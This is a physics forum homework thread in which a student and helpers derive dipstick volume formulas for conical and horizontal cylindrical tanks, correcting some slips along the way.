2020-07-14 04:34:22 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.6649565696716309, "perplexity": 576.7518695784163}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.3, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2020-29/segments/1593657147917.99/warc/CC-MAIN-20200714020904-20200714050904-00049.warc.gz"} |
http://www.physicsforums.com/showthread.php?p=3135200 | # Simple dipstick problem
by pat666
Tags: dipstick, simple
HW Helper
P: 3,326
Quote by pat666 I think it is correct but given the amount of trouble I've had getting the solution you can see why I am unsure.
Yes it's correct. I was just showing you that you can tidy up
Quote by pat666 $$V_(fluid)=(\pi((h/H)*R)^2*h)/3$$ probably simplify down further.
into
Quote by Mentallic Sure, $$V=\frac{\pi h^3R}{3H^2}$$
Quote by pat666 just the way the picture was drawn made me think r=h,
Oh, yeah that would be my fault, sorry
Quote by pat666 which would be true if the water was at the centre.
The blue line was meant to be where the water level was at.
Quote by pat666 I get that $$\theta=2cos^-^1(r-h)/r$$
Yes that's right.
Quote by pat666 not sure if thats correct because you gave me some trig info that was a bit more complex.
My trig info was wrong, ignore it. I forgot about the 2 that was going to be in front of it. What I was meant to give you was
$$\sin\left(2\cos^{-1}\left(x\right)\right)=2x\sqrt{1-x^2}$$
It may look complex, but its purpose is simple. When you plug $\theta$ into the area equation $$A=\frac{r^2}{2}\left(\theta-\sin\theta\right)$$ you're going to be left with
edit: $$\sin\left(2\cos^{-1}\left(\frac{r-h}{r}\right)\right)$$ which is where you can simplify this with the equality I gave above.
You already have the answer, but it's just if you wanted to simplify things a bit more.
Markers wouldn't give full marks if you left an answer as $$\sin\left(\sin^{-1}\left(x\right)\right)$$ so I doubt they would give full marks if you left it as $$\sin\left(\cos^{-1}\left(x\right)\right)$$ either.
Quote by pat666 also this will only work to the halfway point but I was thinking I would just do the reflection of the earlier dipstick points for points after the mid line. thanks
I believe the same formula will work for the water level anywhere from 0 to 2r (the diameter of the circle) but I'll check to see.
P: 709 Ok thanks alot for all your help
PF Patron P: 1,300 The cylinder on it's side problem reduces to y=x - sin(x) in it's simplest form. If you can solve for x, then you can solve the problem. There is a reason they put this problem in computer science text books and never in mathematics text books.
HW Helper
P: 3,326
Quote by pat666 Ok thanks alot for all your help
No worries
Quote by OmCheeto The cylinder on it's side problem reduces to y=x - sin(x) in it's simplest form. If you can solve for x, then you can solve the problem.
Quote by OmCheeto There is a reason they put this problem in computer science text books and never in mathematics text books.
I've seen questions similar to this in maths books.
P: 709 This question is for yr 11 math. My solution is I believe $$V=L*\sin\left(\cos^{-1}\left(2\cdot\frac{r-h}{r}\right)\right)$$.
HW Helper
P: 3,326
Quote by pat666 This question is for yr 11 math. My solution is I believe $$V=L*\sin\left(\cos^{-1}\left(2\cdot\frac{r-h}{r}\right)\right)$$.
That's not right. The formula is $$A=\frac{r^2}{2}\left(\theta-\sin\theta\right)$$ where $$\theta=2\cos^{-1}\left(\frac{r-h}{r}\right)$$
P: 709 whoops I forgot the first theta, so V=L*(r^2/2(2arccos(r-h/r)-sin(2arccos(r-h/r))) pretty messy.
PF Patron
P: 1,300
Quote by Mentallic Can you please elaborate?
Perhaps the question in the book was worded differently.
All I know is that if you have a 10 gallon tank, it is not possible to place integer gallon marks on the dipstick. Unless of course you are clever enough to solve for x.
And perhaps I should give some background regarding this particular problem before someone yells at me for playing mind games.
Related Discussions Introductory Physics Homework 10 Product Claims 10 Advanced Physics Homework 17 Calculus 1 Calculus & Beyond Homework 2 | 2013-12-12 10:46:53 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 1, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.7142637372016907, "perplexity": 871.9258017506806}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 5, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2013-48/segments/1386164580801/warc/CC-MAIN-20131204134300-00002-ip-10-33-133-15.ec2.internal.warc.gz"} |